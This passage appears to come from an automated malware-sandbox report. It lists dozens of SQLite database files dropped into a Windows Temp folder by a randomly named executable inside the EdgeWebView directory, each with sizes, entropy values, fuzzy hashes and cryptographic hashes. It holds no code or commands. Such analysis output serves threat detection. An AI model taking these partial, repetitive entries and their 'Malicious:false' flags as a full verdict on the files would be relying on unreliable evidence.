                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\f1sW3dJsDf

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\f4pgaVtuKn

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\fRAFnYB8EO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\fRPPgPiyiy

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\fXTJa4c9K3

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\fXkSkfGHaM

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\gYbO0x25P1

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\h7eFA7rQfY

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\hORaMhf6Eh

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\hiEiteEq2h

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\hmOuygKQCp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\iC2gDpZhGA

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\iEZ5eV0F2x

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\iNOnwr80fc

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\iX7w4nU2zd

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\igf147ncnx

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\ivpK5pBsdW

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\jAijXtGlDc

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\jW1WoIMp23

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\jgwKaZuc49

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\jvXGKcsz7O

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
